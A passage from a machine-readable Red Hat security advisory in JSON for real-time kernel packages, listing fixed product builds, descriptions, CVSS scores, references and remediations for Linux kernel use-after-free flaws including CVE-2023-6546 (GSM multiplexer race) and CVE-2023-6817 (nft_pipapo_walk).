"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Use-after-free in nft_verdict_dump due to a race between set GC and transaction"
},
{
"cve": "CVE-2023-6546",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-12-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2255498"
}
],
"notes": [
{
"category": "description",
"text": "A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: GSM multiplexing race condition leads to privilege escalation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is critical because it can be exploited to escalate privileges, directly threatening system security. Despite requiring local access and having a high attack complexity, the potential to severely impact confidentiality, integrity, and availability justifies its \"Important\" rating.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6546"
},
{
"category": "external",
"summary": "RHBZ#2255498",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6546"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6546",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6546"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3",
"url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3"
},
{
"category": "external",
"summary": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527"
}
],
"release_date": "2023-12-21T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by preventing the affected `n_gsm` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: GSM multiplexing race condition leads to privilege escalation"
},
{
"acknowledgments": [
{
"names": [
"Xingyuan Mo of IceSword Lab"
]
}
],
"cve": "CVE-2023-6817",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-12-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2255139"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Netfilter subsystem in the Linux kernel via the nft_pipapo_walk function. This issue may allow a local user with CAP_NET_ADMIN capability to trigger an application crash, information disclosure, or local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: inactive elements in nft_pipapo_walk",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Only local users with `CAP_NET_ADMIN` capability or root can trigger this issue. \nOn Red Hat Enterprise Linux, local unprivileged users can exploit unprivileged user namespaces (CONFIG_USER_NS) to grant themselves this capability.\n\nThe OpenShift Container Platform (OCP) control planes or master machines are based on Red Hat Enterprise Linux CoreOS (RHCOS) that consists primarily of RHEL components, therefore, it is also affected by this kernel vulnerability. A successful exploit needs necessary privileges (CAP_NET_ADMIN) and direct, local access. A local user in RHCOS is already a root with full permissions, hence existence of this vulnerability does not bring any value from the potential attacker perspective. From the OpenShift containers perspective, this vulnerability cannot be exploited as in OpenShift the cluster processes on the node are namespaced, which means that switching the namespace in the running OpenShift container will not bring necessary capabilities.\nThis means that for OpenShift, the impact of this vulnerability is Low.\n\nSimilar to the CVE-2023-32233 vulnerability, this has been explained in the following blog post as an example of a \"Container escape vulnerability\":\nhttps://www.redhat.com/en/blog/containers-vulnerability-risk-assessment",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6817"
},
{
"category": "external",
"summary": "RHBZ#2255139",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255139"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6817"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6817",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6817"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a"
}
],
"release_date": "2023-12-18T00:00:00+00:00",
"remediations": [
{
